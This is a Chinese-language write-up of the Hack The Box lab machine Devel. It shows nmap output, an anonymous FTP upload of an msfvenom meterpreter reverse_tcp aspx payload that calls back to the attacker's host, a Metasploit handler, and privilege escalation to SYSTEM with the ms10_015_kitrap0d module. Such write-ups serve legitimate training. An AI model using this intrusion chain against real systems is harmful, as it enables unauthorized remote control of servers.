HTB Devel[Hack The Box HTB靶场]writeup系列3
Retired Machines的第三台机器Devel
目录
0x00 靶机情况
0x01 端口扫描
0x02 ftp服务
0x03 上传payload
0x04 get webshell
0x05 提权
0x00 靶机情况
从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows
0x01 端口扫描
看看靶机提供了哪些服务:
root@kali:~# nmap -T5 -A -v 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 01:51 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating Ping Scan at 01:51
Scanning 10.10.10.5 [4 ports]
Completed Ping Scan at 01:51, 0.41s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:51
Completed Parallel DNS resolution of 1 host. at 01:51, 0.10s elapsed
Initiating SYN Stealth Scan at 01:51
Scanning 10.10.10.5 [1000 ports]
Discovered open port 80/tcp on 10.10.10.5
Discovered open port 21/tcp on 10.10.10.5
Increasing send delay for 10.10.10.5 from 0 to 5 due to 11 out of 22 dropped probes since last increase.
SYN Stealth Scan Timing: About 19.77% done; ETC: 01:53 (0:02:06 remaining)
SYN Stealth Scan Timing: About 25.13% done; ETC: 01:55 (0:03:02 remaining)
SYN Stealth Scan Timing: About 30.50% done; ETC: 01:56 (0:03:27 remaining)
SYN Stealth Scan Timing: About 39.93% done; ETC: 01:57 (0:03:43 remaining)
Stats: 0:04:35 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 54.30% done; ETC: 01:59 (0:03:51 remaining)
SYN Stealth Scan Timing: About 60.33% done; ETC: 01:59 (0:03:22 remaining)
SYN Stealth Scan Timing: About 66.27% done; ETC: 01:59 (0:02:52 remaining)
SYN Stealth Scan Timing: About 72.27% done; ETC: 01:59 (0:02:21 remaining)
SYN Stealth Scan Timing: About 77.63% done; ETC: 01:59 (0:01:55 remaining)
SYN Stealth Scan Timing: About 83.00% done; ETC: 01:59 (0:01:28 remaining)
SYN Stealth Scan Timing: About 88.67% done; ETC: 01:59 (0:00:59 remaining)
Completed SYN Stealth Scan at 02:00, 518.03s elapsed (1000 total ports)
Initiating Service scan at 02:00
Scanning 2 services on 10.10.10.5
Completed Service scan at 02:00, 6.94s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.5
Retrying OS detection (try #2) against 10.10.10.5
Initiating Traceroute at 02:00
Completed Traceroute at 02:00, 1.52s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 02:00
Completed Parallel DNS resolution of 2 hosts. at 02:00, 0.86s elapsed
NSE: Script scanning 10.10.10.5.
Initiating NSE at 02:00
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 02:00, 12.19s elapsed
Initiating NSE at 02:00
Completed NSE at 02:00, 1.91s elapsed
Initiating NSE at 02:00
Completed NSE at 02:00, 0.00s elapsed
Nmap scan report for 10.10.10.5
Host is up (0.38s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.028 days (since Sat Feb 1 01:19:50 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsTRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 493.99 ms 10.10.14.1
2 494.71 ms 10.10.10.5NSE: Script Post-scanning.
Initiating NSE at 02:00
Completed NSE at 02:00, 0.00s elapsed
Initiating NSE at 02:00
Completed NSE at 02:00, 0.00s elapsed
Initiating NSE at 02:00
Completed NSE at 02:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 559.20 secondsRaw packets sent: 3366 (153.268KB) | Rcvd: 281 (14.268KB)
我们可以看到开放了21、80端口,而且ftp服务支持匿名登录
0x02 ftp服务
测试一下ftp服务的具体情况
root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> upload a.out
?Invalid command
ftp> help
Commands may be abbreviated. Commands are:! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send
ftp> put a.out
local: a.out remote: a.out
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
87954 bytes sent in 1.56 secs (54.9896 kB/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
02-04-20 05:23PM 87954 a.out
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> rm a.out
550 The directory name is invalid.
ftp> del a.out
250 DELE command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>
从以上测试的情况来看,我们分析得到如下信息:
- ftp指向的目录应该是iis默认的根目录
- ftp服务支持匿名用户登录
- ftp服务支持匿名用户上传和删除文件
0x03 上传payload
我们利用msf生成aspx的payload文件
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f aspx > a.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2823 bytes
root@kali:~#
注意:这里我走了点弯路,我先生成了asp的payload,但是后来发现asp的payload无法在这个iis服务器上执行
然后我们在ftp服务里面上传aspx的payload
root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-04-20 05:32PM 38579 a.asp
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> del a.asp
250 DELE command successful.
ftp> put a.aspx
local: a.aspx remote: a.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2859 bytes sent in 0.00 secs (34.0819 MB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-04-20 05:41PM 2859 a.aspx
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>
0x04 get webshell
在msf中配置一下监听器
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LHOST yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Wildcard Targetmsf5 exploit(multi/handler) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 10.10.14.20 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Wildcard Target
执行exploit -j -z
可以看到监听器已经在后台执行:
msf5 > jobs Jobs
====Id Name Payload Payload opts-- ---- ------- ------------0 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://10.10.14.20:4444
然后,我们可以在浏览器中访问:
http://10.10.10.5/a.aspx
接下来就会得到反向连接的webshell
msf5 > sessions Active sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------5 meterpreter x86/windows IIS APPPOOL\Web @ DEVEL 10.10.14.20:4444 -> 10.10.10.5:49159 (10.10.10.5)
可以看到我们获得的是iis用户的权限,接下来我们需要做的就是提权
0x05 提权
windows提权首先需要看下系统信息和补丁情况
meterpreter > shell
Process 2620 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.c:\windows\system32\inetsrv>systeminfo
systeminfoHost Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 4/2/2020, 4:23:16 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 710 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.516 MB
Virtual Memory: In Use: 531 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.[01]: Intel(R) PRO/1000 MT Network ConnectionConnection Name: Local Area ConnectionDHCP Enabled: NoIP address(es)[01]: 10.10.10.5c:\windows\system32\inetsrv>wmic qfe
wmic qfe
No Instance(s) Available.c:\windows\system32\inetsrv>
从上面的信息来看,操作系统是windows7的企业版,补丁信息没有具体的列表,那我们就逐个测试一下。
先看下msf中可以利用的windows提权的模块有哪些
msf5 > search windows/local/msMatching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D1 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation2 exploit/windows/local/ms11_080_afdjoinleaf 2011-11-30 average No MS11-080 AfdJoinLeaf Privilege Escalation3 exploit/windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation4 exploit/windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)5 exploit/windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page6 exploit/windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape7 exploit/windows/local/ms14_009_ie_dfsvc 2014-02-11 great Yes MS14-009 .NET Deployment Service IE Sandbox Escape8 exploit/windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference9 exploit/windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference10 exploit/windows/local/ms15_004_tswbproxy 2015-01-13 good Yes MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape11 exploit/windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit12 exploit/windows/local/ms15_078_atmfd_bof 2015-07-11 manual Yes MS15-078 Microsoft Windows Font Driver Buffer Overflow13 exploit/windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Receive Notification Exploit14 exploit/windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation15 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation16 exploit/windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC17 exploit/windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)18 exploit/windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference19 exploit/windows/local/ms_ndproxy 2013-11-27 average Yes MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation
先测试excellent的ms10_092:
msf5 > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > show options Module options (exploit/windows/local/ms10_092_schelevator):Name Current Setting Required Description---- --------------- -------- -----------CMD no Command to execute instead of a payloadSESSION yes The session to run this module on.TASKNAME no A name for the created task (default random)Exploit target:Id Name-- ----0 Windows Vista, 7, and 2008msf5 exploit(windows/local/ms10_092_schelevator) > set session 5
session => 5
msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.20
LHOST => 10.10.14.20
msf5 exploit(windows/local/ms10_092_schelevator) > set lport 1234
lport => 1234
msf5 exploit(windows/local/ms10_092_schelevator) > show options Module options (exploit/windows/local/ms10_092_schelevator):Name Current Setting Required Description---- --------------- -------- -----------CMD no Command to execute instead of a payloadSESSION 5 yes The session to run this module on.TASKNAME no A name for the created task (default random)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 10.10.14.20 yes The listen address (an interface may be specified)LPORT 1234 yes The listen portExploit target:Id Name-- ----0 Windows Vista, 7, and 2008msf5 exploit(windows/local/ms10_092_schelevator) > exploit [*] Started reverse TCP handler on 10.10.14.20:1234
[*] Preparing payload at C:\Windows\TEMP\xyAJFfWWqWKC.exe
[*] Creating task: iRd11XMmcfeJJ
[*] ERROR: The task XML contains a value which is incorrectly formatted or out of range.
[*] (58,4):Task:
[*] Reading the task file contents from C:\Windows\system32\tasks\iRd11XMmcfeJJ...
[-] Exploit failed: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.
[*] Exploit completed, but no session was created.
无法执行,接着我继续测试great的ms10_015:
msf5 > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options Module options (exploit/windows/local/ms10_015_kitrap0d):Name Current Setting Required Description---- --------------- -------- -----------SESSION yes The session to run this module on.Exploit target:Id Name-- ----0 Windows 2K SP4 - Windows 7 (x86)msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 5
session => 5
msf5 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options Module options (exploit/windows/local/ms10_015_kitrap0d):Name Current Setting Required Description---- --------------- -------- -----------SESSION 5 yes The session to run this module on.Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 10.0.2.15 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Windows 2K SP4 - Windows 7 (x86)msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 1234
lport => 1234
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options Module options (exploit/windows/local/ms10_015_kitrap0d):Name Current Setting Required Description---- --------------- -------- -----------SESSION 5 yes The session to run this module on.Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 10.10.14.20 yes The listen address (an interface may be specified)LPORT 1234 yes The listen portExploit target:Id Name-- ----0 Windows 2K SP4 - Windows 7 (x86)msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit [*] Started reverse TCP handler on 10.10.14.20:1234
[*] Launching notepad to host the exploit...
[+] Process 3452 launched.
[*] Reflectively injecting the exploit DLL into 3452...
[*] Injecting exploit into 3452 ...
[*] Exploit injected. Injecting payload into 3452...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 6 opened (10.10.14.20:1234 -> 10.10.10.5:49167) at 2020-02-01 03:21:23 -0500meterpreter > background
[*] Backgrounding session 6...
msf5 exploit(windows/local/ms10_015_kitrap0d) > sessions Active sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------5 meterpreter x86/windows IIS APPPOOL\Web @ DEVEL 10.10.14.20:4444 -> 10.10.10.5:49159 (10.10.10.5)6 meterpreter x86/windows NT AUTHORITY\SYSTEM @ DEVEL 10.10.14.20:1234 -> 10.10.10.5:49167 (10.10.10.5)
我们可以看到,已经成功提权,并建立了新的连接,system用户权限。那就没什么问题了,直接去获取相关flag
c:\Users\Administrator\Desktop>dir
dirVolume in drive C has no label.Volume Serial Number is 8620-71F1Directory of c:\Users\Administrator\Desktop18/03/2017 01:17 �� <DIR> .
18/03/2017 01:17 �� <DIR> ..
18/03/2017 01:17 �� 32 root.txt.txt1 File(s) 32 bytes2 Dir(s) 24.594.886.656 bytes freec:\Users\Administrator\Desktop>cat root.txt.txt
cat root.txt.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b
c:\Users\Administrator\Desktop>cd c:\Users\babis\Desktop\
cd c:\Users\babis\Desktop\c:\Users\babis\Desktop>dir
dirVolume in drive C has no label.Volume Serial Number is 8620-71F1Directory of c:\Users\babis\Desktop18/03/2017 01:14 �� <DIR> .
18/03/2017 01:14 �� <DIR> ..
18/03/2017 01:18 �� 32 user.txt.txt1 File(s) 32 bytes2 Dir(s) 24.594.886.656 bytes freec:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
HTB Devel[Hack The Box HTB靶场]writeup系列3相关推荐
- HTB Optimum[Hack The Box HTB靶场]writeup系列6
这是HTB retire machine的第六台靶机 目录 0x00 靶机情况 0x01 信息搜集 端口扫描 检索应用 0x02 get webshell 0x03 提权 mfs中查找提权程序 执行s ...
- [Hack The Box] HTB—Paper walkthrough
[Hack The Box] HTB-Paper walkthrough HTB-Paper [Hack The Box] HTB-Paper walkthrough 一.信息搜集 X-Backend ...
- [网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识
在撰写这篇文章之前,我先简单分享下hack the box实验感受.hack the box是一个在线渗透平台,模拟了真实环境且难度较大,而且用户注册该网站时需要绕过关卡并获取邀请码,涉及审查元素.b ...
- Hack The Box - Access Writeup
第一次尝试Hack The Box,在难度较低的Access上,前后花了有两天的时间,汗.收获还是很大,在此记录一下,以便后阅. 首先是获取user,通过nmap扫描,可以发现目标主机开了三个端口21 ...
- Hack The Box,一款有意思的渗透测试平台
前言 Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法.它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的 ...
- 【Hack The Box】linux练习-- SneakyMailer
HTB 学习笔记 [Hack The Box]linux练习-- SneakyMailer
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- 【Hack The Box】linux练习-- Blunder
HTB 学习笔记 [Hack The Box]linux练习-- Blunder
- 【Hack The Box】windows练习-- Silo
HTB 学习笔记 [Hack The Box]windows练习-- Silo
- 【Hack The Box】linux练习-- Ophiuchi
HTB 学习笔记 [Hack The Box]linux练习-- Ophiuchi
最新文章
- 用二项逻辑斯蒂回归解决二分类问题
- BAPI_PO_CHANGE修改NETPRICE
- 阿里Java编程规约(控制语句)
- https://gogs.io/
- PyTorch 1.6、TensorFlow 2.3、Pandas 1.1 同日发布!都有哪些新特性?
- 问题查询-批文页面显示别人操作的结果
- 最好用的音轨分离软件spleeter:处理一首歌仅几秒,上线一周收获2.4k星 | 附实测...
- 排队论模型及MATLAB实现
- 模电摸索日记之《直流稳压电源的组成及主要技术指标》
- 打印机脱机了怎么恢复打印
- 数据科学分布——Beta分布
- pytest文档56-插件打包上传到 pypi 库
- Android中删除EditText中内容时报SPAN_EXCLUSIVE_EXCLUSIVE spans cannot have a zero length
- 基层社会治理综合管理平台智慧街道Java商业源码
- 关于电信基站nid,sid,bid
- pandas入门(6)——数据加载、存储与文件格式
- Java 在Word中嵌入多媒体(视频、音频)文件
- 江苏省计算机二级vb知识点,2020年全国计算机二级VB复习知识点:数据类型
- NetApp:世界杯盘点之数据增长篇
- 在职场中,千万不要当这两种下属,学会汇报,让领导刮目相看!
热门文章
- python北京房价预测_Python爬虫告诉你北京房价有多高
- 格拉姆矩阵(Gram matrix)详细解读
- Android各厂商自启动管理界面
- 关键点检测——无监督
- Paper intensive reading (二十五):Fecal Viral ...Virion-Enriched Metagenomics and Metatranscriptomics
- 论文阅读:Negative Lexically Constrained Decoding for Paraphrase Generation
- 【域名】查看MX记录是否生效
- learning psychology
- 《火星救援》中的科学与不科学
- ValueError: y contains previously unseen labels: ‘103125‘